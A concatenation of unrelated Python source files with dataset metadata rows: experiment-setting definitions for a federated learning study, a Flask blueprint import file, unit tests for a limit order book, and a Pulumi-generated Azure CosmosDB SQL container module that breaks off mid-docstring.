is used for training.
"""
size = 20 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper4_setting1.npy', dictionary1)
"""
Exper 4:
(2) 20 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 20; ResNet18 with group normalization
is used for training.
"""
size = 20 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 20
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary2 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper4_setting2.npy', dictionary2)
"""
Exper 4:
(4) 30 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training.
"""
size = 30 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary3 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper4_setting3.npy', dictionary3)
"""
Exper 4:
(4) 30 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 30; ResNet18 with group normalization
is used for training.
"""
size = 30 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 30
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary4 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper4_setting4.npy', dictionary4)
"""
Exper 5:
(1) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with group normalization
is used for training, grouping-based model average H = 1.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 1
cp = [16]
model = ['res_gn']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper5_setting1.npy', dictionary1)
"""
Exper 6:
(1) 10 users, R = 0.4, Communication period = 16;
Server data number N_s = 1000, Number of participating clients C_k = 10; ResNet18 with batch normalization
is used for training.
"""
size = 10 + 1
batch_size = 64
basicLabelRatio = 0.4
iid = 0
num_comm_ue = 10
k_img = 65536
epoches = 300
H = 0
cp = [16]
model = ['res']
num_data_server = 1000
dictionary1 = {'size':size, 'batch_size':batch_size, 'cp':cp,
'basicLabelRatio':basicLabelRatio, 'model':model, 'iid':iid,
'num_comm_ue':num_comm_ue, 'k_img':k_img, 'epoches':epoches,
'H':H, 'num_data_server':num_data_server,}
np.save(path_setting+'Exper6_setting1.npy', dictionary1)
| 30.083333 | 135 | 0.658064 | 2,254 | 14,801 | 4.120231 | 0.062555 | 0.044471 | 0.057177 | 0.025843 | 0.841822 | 0.834284 | 0.829547 | 0.829547 | 0.816302 | 0.816302 | 0 | 0.07535 | 0.193906 | 14,801 | 491 | 136 | 30.144603 | 0.703042 | 0.099453 | 0 | 0.858065 | 0 | 0 | 0.207303 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009677 | 0 | 0.009677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
387ca7d1b40da612fd73c187bfce085f1e7a891c | 133 | py | Python | FlaskTemplate/{{cookiecutter.project}}/{{cookiecutter.project_name}}/blueprints/__init__.py | ThaWeatherman/FlaskTemplate | 7fd026ee479a90f9153970169713e338e1cdff83 | [
"MIT"
] | 1 | 2020-06-14T01:42:55.000Z | 2020-06-14T01:42:55.000Z | FlaskTemplate/{{cookiecutter.project}}/{{cookiecutter.project_name}}/blueprints/__init__.py | ThaWeatherman/FlaskTemplate | 7fd026ee479a90f9153970169713e338e1cdff83 | [
"MIT"
] | null | null | null | FlaskTemplate/{{cookiecutter.project}}/{{cookiecutter.project_name}}/blueprints/__init__.py | ThaWeatherman/FlaskTemplate | 7fd026ee479a90f9153970169713e338e1cdff83 | [
"MIT"
] | null | null | null | from .api import api_blueprint
from .auth import auth_blueprint
from .errors import error_blueprint
from .main import main_blueprint
| 26.6 | 35 | 0.849624 | 20 | 133 | 5.45 | 0.4 | 0.357798 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120301 | 133 | 4 | 36 | 33.25 | 0.931624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
387fd175533abc05671c4cf6e05d652e55dc3ab8 | 13,196 | py | Python | limit_order_book/test/test_limit_order_book.py | Kautenja/lob | 88416a12a0b34b026cbf1d598823fd315a1f2dbf | [
"MIT"
] | 67 | 2020-04-09T23:36:26.000Z | 2022-03-24T06:55:38.000Z | limit_order_book/test/test_limit_order_book.py | Kautenja/lob | 88416a12a0b34b026cbf1d598823fd315a1f2dbf | [
"MIT"
] | 1 | 2022-02-23T03:37:47.000Z | 2022-02-23T23:48:51.000Z | limit_order_book/test/test_limit_order_book.py | Kautenja/lob | 88416a12a0b34b026cbf1d598823fd315a1f2dbf | [
"MIT"
] | 24 | 2020-01-17T13:47:49.000Z | 2022-03-29T21:09:23.000Z | """Test cases for the lob module."""
from unittest import TestCase
from .. import limit_order_book
class ShouldInitializeLimitOrderBook(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
self.assertIsInstance(book, limit_order_book.LimitOrderBook)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
#
# MARK: limit
#
class ShouldPlaceSellLimitOrder(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
self.assertEqual(50, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(50, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(100, book.volume_sell())
self.assertEqual(100, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(100, book.volume())
self.assertEqual(100, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(1, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(1, book.count())
class ShouldPlaceSellLimitOrderByValue(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit(False, 1, 100, 50)
self.assertEqual(50, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(50, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(100, book.volume_sell())
self.assertEqual(100, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(100, book.volume())
self.assertEqual(100, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(1, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(1, book.count())
class ShouldPlaceBuyLimitOrder(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_buy(1, 100, 50)
self.assertEqual(0, book.best_sell())
self.assertEqual(50, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(50, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(50))
self.assertEqual(100, book.volume_buy())
self.assertEqual(100, book.volume_buy(50))
self.assertEqual(100, book.volume())
self.assertEqual(100, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(1, book.count_buy())
self.assertEqual(1, book.count())
class ShouldPlaceBuyLimitOrderByValue(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit(True, 1, 100, 50)
self.assertEqual(0, book.best_sell())
self.assertEqual(50, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(50, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(50))
self.assertEqual(100, book.volume_buy())
self.assertEqual(100, book.volume_buy(50))
self.assertEqual(100, book.volume())
self.assertEqual(100, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(1, book.count_buy())
self.assertEqual(1, book.count())
#
# MARK: limit match
#
class ShouldMatchSellLimitOrderWithIncomingBuy(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
book.limit_buy(2, 100, 50)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(50))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(50))
self.assertEqual(0, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldMatchBuyLimitOrderWithIncomingSell(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_buy(1, 100, 50)
book.limit_sell(2, 100, 50)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(50))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(50))
self.assertEqual(0, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
#
# MARK: cancel
#
class ShouldCancelSellLimitOrder(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
self.assertTrue(book.has(1))
book.cancel(1)
self.assertFalse(book.has(1))
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldCancelBuyLimitOrder(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_buy(1, 100, 50)
self.assertTrue(book.has(1))
book.cancel(1)
self.assertFalse(book.has(1))
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
#
# MARK: market
#
class ShouldPlaceSellMarketOrderEmptyBook(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.market_sell(1, 100)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldPlaceBuyMarketOrderEmptyBook(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.market_buy(1, 100)
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldPlaceSellMarketOrderAndMatch(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_buy(1, 100, 50)
book.market_sell(1, 10)
self.assertEqual(0, book.best_sell())
self.assertEqual(50, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(50, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(90, book.volume_buy())
self.assertEqual(90, book.volume_buy(50))
self.assertEqual(90, book.volume())
self.assertEqual(90, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(0, book.count_sell())
self.assertEqual(1, book.count_buy())
self.assertEqual(1, book.count())
class ShouldPlaceBuyMarketOrderAndMatch(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
book.market_buy(1, 10)
self.assertEqual(50, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(50, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(90, book.volume_sell())
self.assertEqual(90, book.volume_sell(50))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(50))
self.assertEqual(90, book.volume())
self.assertEqual(90, book.volume(50))
self.assertEqual(1, book.count_at(50))
self.assertEqual(1, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(1, book.count())
#
# MARK: clear
#
class ShouldClearSellLimitOrders(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
book.limit_sell(2, 100, 50)
book.limit_sell(3, 100, 50)
self.assertTrue(book.has(1))
self.assertTrue(book.has(2))
self.assertTrue(book.has(3))
book.clear()
self.assertFalse(book.has(1))
self.assertFalse(book.has(2))
self.assertFalse(book.has(3))
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
class ShouldClearBuyLimitOrders(TestCase):
def test(self):
book = limit_order_book.LimitOrderBook()
book.limit_sell(1, 100, 50)
book.limit_sell(2, 100, 50)
book.limit_sell(3, 100, 50)
self.assertTrue(book.has(1))
self.assertTrue(book.has(2))
self.assertTrue(book.has(3))
book.clear()
self.assertFalse(book.has(1))
self.assertFalse(book.has(2))
self.assertFalse(book.has(3))
self.assertEqual(0, book.best_sell())
self.assertEqual(0, book.best_buy())
self.assertEqual(0, book.best(False))
self.assertEqual(0, book.best(True))
self.assertEqual(0, book.volume_sell())
self.assertEqual(0, book.volume_sell(100))
self.assertEqual(0, book.volume_buy())
self.assertEqual(0, book.volume_buy(100))
self.assertEqual(0, book.volume())
self.assertEqual(0, book.volume(100))
self.assertEqual(0, book.count_at(100))
self.assertEqual(0, book.count_sell())
self.assertEqual(0, book.count_buy())
self.assertEqual(0, book.count())
| 38.249275 | 68 | 0.64224 | 1,677 | 13,196 | 4.942159 | 0.034586 | 0.376448 | 0.297297 | 0.371622 | 0.922297 | 0.920849 | 0.908663 | 0.908663 | 0.908663 | 0.900458 | 0 | 0.052754 | 0.217111 | 13,196 | 344 | 69 | 38.360465 | 0.749492 | 0.007502 | 0 | 0.902685 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.755034 | 1 | 0.050336 | false | 0 | 0.006711 | 0 | 0.107383 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
38ad53229b8fe806fbbb4e414c127b69a5c64ca3 | 46,804 | py | Python | sdk/python/pulumi_azure/cosmosdb/sql_container.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/cosmosdb/sql_container.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/cosmosdb/sql_container.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SqlContainerArgs', 'SqlContainer']
@pulumi.input_type
class SqlContainerArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
database_name: pulumi.Input[str],
partition_key_path: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']] = None,
conflict_resolution_policy: Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]] = None):
"""
The set of arguments for constructing a SqlContainer resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[str] database_name: The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[str] partition_key_path: Define a partition key. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['SqlContainerAutoscaleSettingsArgs'] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
:param pulumi.Input['SqlContainerConflictResolutionPolicyArgs'] conflict_resolution_policy: A `conflict_resolution_policy` blocks as defined below.
:param pulumi.Input[int] default_ttl: The default time to live of SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['SqlContainerIndexingPolicyArgs'] indexing_policy: An `indexing_policy` block as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
:param pulumi.Input[int] partition_key_version: Define a partition key version. Changing this forces a new resource to be created. Possible values are `1 `and `2`. This should be set to `2` in order to use large partition keys.
:param pulumi.Input[int] throughput: The throughput of SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation otherwise it cannot be updated without a manual resource destroy-apply.
:param pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]] unique_keys: One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "partition_key_path", partition_key_path)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if analytical_storage_ttl is not None:
pulumi.set(__self__, "analytical_storage_ttl", analytical_storage_ttl)
if autoscale_settings is not None:
pulumi.set(__self__, "autoscale_settings", autoscale_settings)
if conflict_resolution_policy is not None:
pulumi.set(__self__, "conflict_resolution_policy", conflict_resolution_policy)
if default_ttl is not None:
pulumi.set(__self__, "default_ttl", default_ttl)
if indexing_policy is not None:
pulumi.set(__self__, "indexing_policy", indexing_policy)
if name is not None:
pulumi.set(__self__, "name", name)
if partition_key_version is not None:
pulumi.set(__self__, "partition_key_version", partition_key_version)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
if unique_keys is not None:
pulumi.set(__self__, "unique_keys", unique_keys)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="partitionKeyPath")
def partition_key_path(self) -> pulumi.Input[str]:
"""
Define a partition key. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "partition_key_path")
@partition_key_path.setter
def partition_key_path(self, value: pulumi.Input[str]):
pulumi.set(self, "partition_key_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@analytical_storage_ttl.setter
def analytical_storage_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "analytical_storage_ttl", value)
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']]:
"""
An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@autoscale_settings.setter
def autoscale_settings(self, value: Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']]):
pulumi.set(self, "autoscale_settings", value)
@property
@pulumi.getter(name="conflictResolutionPolicy")
def conflict_resolution_policy(self) -> Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']]:
"""
A `conflict_resolution_policy` blocks as defined below.
"""
return pulumi.get(self, "conflict_resolution_policy")
@conflict_resolution_policy.setter
def conflict_resolution_policy(self, value: Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']]):
pulumi.set(self, "conflict_resolution_policy", value)
@property
@pulumi.getter(name="defaultTtl")
def default_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "default_ttl")
@default_ttl.setter
def default_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl", value)
@property
@pulumi.getter(name="indexingPolicy")
def indexing_policy(self) -> Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']]:
"""
An `indexing_policy` block as defined below.
"""
return pulumi.get(self, "indexing_policy")
@indexing_policy.setter
def indexing_policy(self, value: Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']]):
pulumi.set(self, "indexing_policy", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="partitionKeyVersion")
def partition_key_version(self) -> Optional[pulumi.Input[int]]:
"""
Define a partition key version. Changing this forces a new resource to be created. Possible values are `1 `and `2`. This should be set to `2` in order to use large partition keys.
"""
return pulumi.get(self, "partition_key_version")
@partition_key_version.setter
def partition_key_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "partition_key_version", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The throughput of SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation otherwise it cannot be updated without a manual resource destroy-apply.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
@property
@pulumi.getter(name="uniqueKeys")
def unique_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]]:
"""
One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "unique_keys")
@unique_keys.setter
def unique_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]]):
pulumi.set(self, "unique_keys", value)
@pulumi.input_type
class _SqlContainerState:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']] = None,
conflict_resolution_policy: Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_path: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]] = None):
"""
Input properties used for looking up and filtering SqlContainer resources.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n` – items will expire `n` seconds after their last modified time.
:param pulumi.Input['SqlContainerAutoscaleSettingsArgs'] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
:param pulumi.Input['SqlContainerConflictResolutionPolicyArgs'] conflict_resolution_policy: A `conflict_resolution_policy` blocks as defined below.
:param pulumi.Input[str] database_name: The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
